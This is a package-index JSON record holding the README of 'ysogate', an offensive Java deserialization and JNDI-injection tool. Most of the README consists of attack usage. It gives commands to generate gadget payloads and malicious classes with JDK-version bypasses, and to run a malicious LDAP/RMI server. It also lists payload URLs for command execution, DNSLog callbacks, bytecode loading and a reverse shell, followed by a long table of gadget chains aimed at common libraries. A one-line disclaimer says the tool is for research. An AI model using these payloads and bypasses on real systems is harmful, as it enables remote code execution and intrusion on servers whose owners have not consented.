{"id":13575557,"url":"https://github.com/H4cking2theGate/ysogate","last_synced_at":"2025-04-04T22:31:30.147Z","repository":{"id":202801385,"uuid":"708080877","full_name":"H4cking2theGate/ysogate","owner":"H4cking2theGate","description":"Java反序列化/JNDI注入/恶意类生成工具,支持多种高版本bypass,支持回显/内存马等多种扩展利用。","archived":false,"fork":false,"pushed_at":"2025-02-09T08:23:11.000Z","size":277,"stargazers_count":89,"open_issues_count":0,"forks_count":7,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-02-09T09:24:15.724Z","etag":null,"topics":["bypass","deserialization-vulnerability","java","jndi-exploit","jrmp","ldap","payload-generator","rmi","ysoserial"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/H4cking2theGate.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-21T13:20:19.000Z","updated_at":"2025-02-09T08:23:14.000Z","dependencies_parsed_at":null,"dependency_job_id":"ea385061-d422-4f09-ad1d-952d7d7ade74","html_url":"https://github.com/H4cking2theGate/ysogate","commit_stats":null,"previous_names":["h4cking2thegate/ysogate"],"tags_count":9,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/H4cking2theGate","download_url":"https://codeload.github.com/H4cking2theGate/ysogate/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247260654,"owners_count":20910047,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","deserialization-vulnerability","java","jndi-exploit","jrmp","ldap","payload-generator","rmi","ysoserial"],"created_at":"2024-08-01T15:01:02.129Z","updated_at":"2025-04-04T22:31:25.138Z","avatar_url":"https://github.com/H4cking2theGate.png","language":"Java","readme":"# ysogate\n\nysogate是一个java综合利用工具,支持JNDI注入相关利用,包含多种高版本jdk绕过方式,且支持片段化gadget生成和组合。\n\n- 生成多种Java反序列化gadget payload\n- 支持JNDI/LDAP/RMI/JRMP等多种利用方式\n- 灵活的命令行界面,支持多种操作模式\n- 可扩展的架构,便于添加新的gadget和攻击向量\n- 支持多种高版本jdk绕过方式\n- 支持扩展利用方式,如内存马,回显,代理等\n\n## Usage\n\n分为两种模式,指定`-m jndi`来启动 JNDI Server,指定`-m payload`来生成反序列化payload,指定`-m gen`来生成恶意类\n\n```bash\n[root]#~ H4cking to the Gate !\n[root]#~ Usage:\n[root]#~ Payload Mode: java -jar ysogate-[version]-all.jar -m payload [PAYLOAD OPTIONS]\n[root]#~ JNDI Mode: java -jar ysogate-[version]-all.jar -m jndi [JNDI OPTIONS]\n[root]#~ Gen Mode: java -jar ysogate-[version]-all.jar -m gen [GEN OPTIONS]\n```\n## Gen Mode\n\n可以使用`-m gen`来使用gen模式,用于生成恶意类\n\n```\n[root]#~ Gen Mode Options:\n -bypass ByPass JDK Module\n -f,--format \u003carg\u003e Output format\n -h,--help Show help message\n -m,--mode \u003carg\u003e Operation mode: 'payload' or 'jndi' or 'gen'\n -name,--classname \u003carg\u003e Evil Class Name\n -s,--sink \u003carg\u003e Evil sink template\n -t,--type \u003carg\u003e Middleware type\n```\n\n示例,生成springmvc的命令执行回显,添加-bypass绕过jdk高版本限制,适用于jdk17\n\n```\njava -jar ysogate-[version]-all.jar -m gen -t springmvc -s CmdExec -name org.springframework.expression.Evil -bypass\n```\n\n以下是支持的中间件/框架以及执行模式\n\n| 中间件/框架 | 执行模式 |\n| ----------- | ----------------- |\n| springmvc | CmdExec,CodeExec |\n| tomcat | CmdExec,CodeExec |\n| resin | CmdExec,CodeExec |\n| weblogic | CmdExec,CodeExec |\n| jetty | CmdExec,CodeExec |\n| websphere | CmdExec,CodeExec |\n| undertow | CmdExec,CodeExec |\n| glassfish | CmdExec,CodeExec |\n| struts2 | CmdExec,CodeExec |\n\n## JNDI Mode\n\n可以使用`-m jndi`来使用jndi模式,这个模式会在本地运行恶意的jndi服务器\n\n```\n[root]#~ JNDI Mode Options:\n -h,--help Show help message\n -hp,--httpPort \u003carg\u003e HTTP port\n -i,--ip \u003carg\u003e IP address for JNDI server\n -ldap2rmi change ldap to rmi to bypass trustSerialData\n -lp,--ldapPort \u003carg\u003e LDAP port\n -m,--mode \u003carg\u003e Operation mode: 'payload' or 'jndi' or 'gen'\n -onlyRef use Reference only to bypass trustSerialData\n -rp,--rmiPort \u003carg\u003e RMI port\n```\n\n例如\n\n```\njava -jar ysogate-[version]-all.jar -m jndi -i 0.0.0.0 -onlyRef\n```\n\n### trustSerialData 绕过\n\n在JDK20+版本中`com.sun.jndi.ldap.object.trustSerialData`属性默认为`false`,无法在com.sun.jndi.ldap.Obj#decodeObject中反序列化,绕过方式主要有:\n\n**ldap2rmi**\n\n通过设置javaRemoteLocation来使用com.sun.jndi.ldap.Obj#decodeRmiObject还原Factory对象,从ldap转换成rmi进行绕过\n\n可以在启动时添加`-ldap2rmi`来进行可能的绕过,例如\n\n```\njava -jar ysogate-[version]-all.jar -m jndi -i 0.0.0.0 -ldap2rmi\n```\n\n**onlyRef**\n\n利用本地Factory进行攻击时,可以通过设置`objectClass`为`javaNamingReference`来避免进行反序列化,利用decodeReference来还原Factory对象,不适用于BeanFactory绕过,因为BeanFactory需要ResourceRef类型。\n\n可以在启动时添加`-onlyRef`来进行可能的绕过,例如\n\n```\njava -jar ysogate-[version]-all.jar -m jndi -i 0.0.0.0 -onlyRef\n```\n\n### codebase 注入\n\nldap和rmi通用,通过 JNDI Reference 指定codebase,远程加载ObjectFactory,需要trustURLCodebase=true,\n\n```\n# 参数支持urlsafe base64\nldap://127.0.0.1:1389/Basic/xxxxxxx/Y2FsYw==\n\n# 执行命令\nldap://127.0.0.1:1389/Basic/Command/calc\n\n# Dnslog\nldap://127.0.0.1:1389/Basic/DNSLog/xxx.dnslog.cn\n\n# 加载自定义字节码\nldap://127.0.0.1:1389/Basic/Custom/data:yv66vxxxxxxxxxxxxx\n\n# 从/tmp/a.class加载自定义字节码\nldap://127.0.0.1:1389/Basic/Custom/file:L3RtcC9hLmNsYXNz\n\n# 加载内存马(todo)\nldap://127.0.0.1:1389/Basic/Custom/mem:Tomcat\n\n# 原生反弹 Shell (支持 Windows)\nldap://127.0.0.1:1389/Basic/ReverseShell/127.0.0.1/4444\n```\n\n### 基于 BeanFactory\n\nBeanFactory这个类在tomcat8+或者SpringBoot 1.2.x+存在\n\n且要求tomcat版本小于9.0.63,或小于8.5.79\n\n**Tomcat ELProcessor**\n\n利用javax.el.ELProcessor#eval\n\n```\n# 使用方式同Basic\n\n# 使用el调用ScriptEngineManager来加载字节码(nashorn在JDK15后被移除)\nldap://127.0.0.1:1389/ELProcessor/Command/calc\nldap://127.0.0.1:1389/ELProcessor/Custom/data:yv66vxxxxxxxxxxxxx\n\n# jdk9以上可以用el调用JShell来加载字节码\nldap://127.0.0.1:1389/EL2JShell/Command/calc\n```\n\n**GroovyShell \u0026 GroovyClassLoader**\n\n利用groovy.lang.GroovyShell#evaluate和groovy.lang.GroovyClassLoader#parseClass(java.lang.String)\n\n```**SnakeYaml**\n# 使用方式同Basic\nldap://127.0.0.1:1389/GroovyClassLoader/Command/calc\nldap://127.0.0.1:1389/GroovyShell/Command/calc\n```\n\n**SnakeYaml**\n\n利用org.yaml.snakeyaml.Yaml#load(java.lang.String)\n\n```\n# 使用方式同Basic\nldap://127.0.0.1:1389/SnakeYaml/Command/calc\n```\n\n**XStream**\n\n利用com.thoughtworks.xstream.XStream#fromXML(java.net.URL)\n\n可以打CVE-2021-39149,要求XStream \u003c 1.4.18\n\n```\n# 暂时只写了执行命令\nldap://127.0.0.1:1389/XStream/calc\n```\n\n**MLet**\n\n通过 MLet 探测 classpath 中存在的类\n\n```\nldap://127.0.0.1:1389/MLet/com.example.TestClass\n```\n\n如果 `com.example.TestClass` 这个类存在, 则 HTTP 服务器会接收到一个 `/com/example/TestClass_exists.class` 请求\n\n**NativeLibLoader**\n\n利用com.sun.glass.utils.NativeLibLoader#loadLibrary加载目标服务器上的动态链接库,适用于能够写文件的场景\n\n写入dll/so/dylib文件,例如/tmp/evil.so,使用时把路径去掉后缀, 即/tmp/evil\n\n```\nldap://127.0.0.1:1389/NativeLibLoader/L3RtcC9ldmls\n```\n\n### JDBC RCE\n\n支持以下数据库连接池\n\n- Commons DBCP\n- Tomcat DBCP\n- Tomcat JDBC\n- Alibaba Druid\n- HikariCP\n- C3P0\n\n支持以下数据库\n\n- Mysql\n- PostgreSQL\n- H2\n- IBM DB2\n- Derby\n- Teradata\n\n### 反序列化\n\n通过反序列化来进行RCE,暂不支持rmi协议\n\n```\n# 执行命令\nldap://127.0.0.1:1389/Deserialize/{gadget}/Command/{cmd}\n\n# 加载自定义字节码(部分需要继承AbstractTranslet)\nldap://127.0.0.1:1389/Deserialize/{gadget}/Custom/data:yv66vxxxxxxxxxxxxx\n\n# 从/tmp/a.class加载自定义字节码(部分需要继承AbstractTranslet)\nldap://127.0.0.1:1389/Deserialize/{gadget}/Custom/file:L3RtcC9hLmNsYXNz\n\n# 加载内存马(todo)\nldap://127.0.0.1:1389/Deserialize/{gadget}/Custom/mem:Tomcat\n\n# example\nldap://127.0.0.1:1389/Deserialize/Jackson2/Command/calc\n```\n\n## Payload Mode\n\n可以使用`-m payload`来使用payload模式,这个模式下会生成自定义的反序列化payload,例如\n\n```\njava -jar ysogate-[version]-all.jar -m payload -g Jackson1 -p calc -b64\n```\n\n完整用法如下\n\n```bash\n[root]#~ H4cking to the Gate !\n[root]#~ Usage:\n[root]#~ Payload Mode: java -jar ysogate-[version]-all.jar -m payload [PAYLOAD OPTIONS]\n[root]#~ JNDI Mode: java -jar ysogate-[version]-all.jar -m jndi [JNDI OPTIONS]\n\n[root]#~ Payload Mode Options:\n -b64,--base64 Encode Output into base64\n -f,--file \u003carg\u003e Write Output into FileOutputStream (Specified FileName)\n -g,--gadget \u003carg\u003e Java deserialization gadget\n -h,--help Show help message\n -m,--mode \u003carg\u003e Operation mode: 'payload' or 'jndi'\n -ol,--overlong Use overlong UTF-8 encoding\n -p,--parameters \u003carg\u003e Gadget parameters\n\n\n[root]#~ Available payload types:\n00:40:55.537 [main] INFO org.reflections.Reflections - Reflections took 63 ms to scan 1 urls, producing 22 keys and 233 values\n Payload Dependencies \n ------- ------------ \n AspectJWeaver aspectjweaver:1.9.2, commons-collections:3.2.2 \n AspectJWeaver2 aspectjweaver:1.9.2, commons-collections:3.2.2 \n BeanShell1 bsh:2.0b5 \n BeanShell20b4 bsh:2.0b4 \n C3P0 c3p0:0.9.5.2, mchange-commons-java:0.2.11 \n C3P02 c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35 \n C3P03 c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35, groovy:2.3.9 \n C3P04 c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35, snakeyaml:1.30 \n C3P092 c3p0:0.9.2-pre2-RELEASE ~ 0.9.5-pre8, mchange-commons-java:0.2.11 \n Click1 click-nodeps:2.3.0, javax.servlet-api:3.1.0 \n Clojure clojure:1.8.0 \n CommonsBeanutils1 commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 \n CommonsBeanutils1183NOCC commons-beanutils:1.8.3 \n CommonsBeanutils2 commons-beanutils:1.9.2 \n CommonsBeanutils2183NOCC commons-beanutils:1.8.3, commons-logging:1.2 \n CommonsBeanutils3 commons-beanutils:1.9.2, commons-collections:3.1 \n CommonsBeanutils3183 commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 \n CommonsBeanutils4 commons-beanutils:1.9.2, commons-collections:3.1 \n CommonsBeanutilsAttrCompare commons-beanutils:1.9.2 \n CommonsBeanutilsAttrCompare183 commons-beanutils:1.8.3 \n CommonsBeanutilsObjectToStringComparator commons-beanutils:1.9.2, commons-lang3:3.10 \n CommonsBeanutilsObjectToStringComparator183 commons-beanutils:1.8.3, commons-lang3:3.10 \n CommonsBeanutilsPropertySource commons-beanutils:1.9.2, log4j-core:2.17.1 \n CommonsBeanutilsPropertySource183 commons-beanutils:1.9.2, log4j-core:2.17.1 \n CommonsCollections1 commons-collections:3.1 \n CommonsCollections10 commons-collections:3.2.1 \n CommonsCollections11 \n CommonsCollections12 commons-collections:3.2.1 \n CommonsCollections2 commons-collections4:4.0 \n CommonsCollections3 commons-collections:3.1 \n CommonsCollections4 commons-collections4:4.0 \n CommonsCollections5 commons-collections:3.1 \n CommonsCollections6 commons-collections:3.1 \n CommonsCollections6Lite commons-collections:3.1 \n CommonsCollections7 commons-collections:3.1 \n CommonsCollections8 commons-collections4:4.0 \n CommonsCollections9 commons-collections:3.2.1 \n CommonsCollectionsK1 commons-collections:\u003c=3.2.1 \n CommonsCollectionsK2 commons-collections4:4.0 \n Fastjson1 \u003c=1.2.xx \n Fastjson2 \u003c=2.0.26? \n FileUpload1 commons-fileupload:1.3.1, commons-io:2.4 \n Groovy1 groovy:2.3.9 \n Hibernate1 hibernate-core:4.3.11.Final, aopalliance:1.0, jboss-logging:3.3.0.Final, javax.transaction-api:1.2, dom4j:1.6.1 \n Hibernate2 hibernate-core:4.3.11.Final, aopalliance:1.0, jboss-logging:3.3.0.Final, javax.transaction-api:1.2, dom4j:1.6.1 \n JBossInterceptors1 javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 \n JRE8u20 \n JRE8u20_2 \n JRMPClient \n JRMPClient_Activator \n JRMPClient_Obj \n JRMPListener \n JSON1 json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1\n Jackson1 jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE \n Jackson2 jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE \n JavassistWeld1 javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 \n Jdk7u21 \n Jdk7u21variant \n Jython1 jython-standalone:2.5.2 \n MozillaRhino1 js:1.7R2 \n MozillaRhino2 js:1.7R2 \n Myfaces1 \n Myfaces2 myfaces-impl:2.2.9, myfaces-api:2.2.9, apache-el:8.0.27, javax.servlet-api:3.1.0, mockito-core:1.10.19, hamcrest-core:1.1, objenesis:2.1 \n ROME rome:1.0 \n ROME2 rome:1.0 \n ROME3 rome:1.0 \n SignedObject \n Spring1 spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE \n Spring2 spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 \n Spring3 spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2 \n URLDNS \n Vaadin1 vaadin-server:7.7.14, vaadin-shared:7.7.14 \n Wicket1 wicket-util:6.23.0, slf4j-api:1.6.4 \n XStream39144 Xstream:\u003c1.4.18 \n XStream39149 Xstream:\u003c1.4.18 \n\n```\n\n## Todo\n- [x] 基础的反序列化生成payload\n- [x] 增加JNDI/LDAP/RMI/JRMP等利用方式\n- [x] 绕过trustSerialData\n- [ ] 完善第三方库的gadget\n- [x] 添加中间件回显\n- [ ] 在加载字节码方面增加扩展攻击如回显,内存马,代理等\n- [ ] 补充RMI反序列化的利用\n- [x] 防护绕过方面的补充,增加OverlongUTF8/脏数据等绕过\n\n\n\n## 免责声明\n本项目仅面向安全研究与学习,禁止任何非法用途\n\n如您在使用本项目的过程中存在任何非法行为,您需自行承担相应后果\n\n除非您已充分阅读、完全理解并接受本协议,否则,请您不要使用本项目\n\n\n\n## Reference\n\n - https://github.com/frohoff/ysoserial\n - https://github.com/X1r0z/JNDIMap\n - https://tttang.com/archive/1405/","funding_links":[],"categories":["Java"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FH4cking2theGate%2Fysogate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FH4cking2theGate%2Fysogate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FH4cking2theGate%2Fysogate/lists"}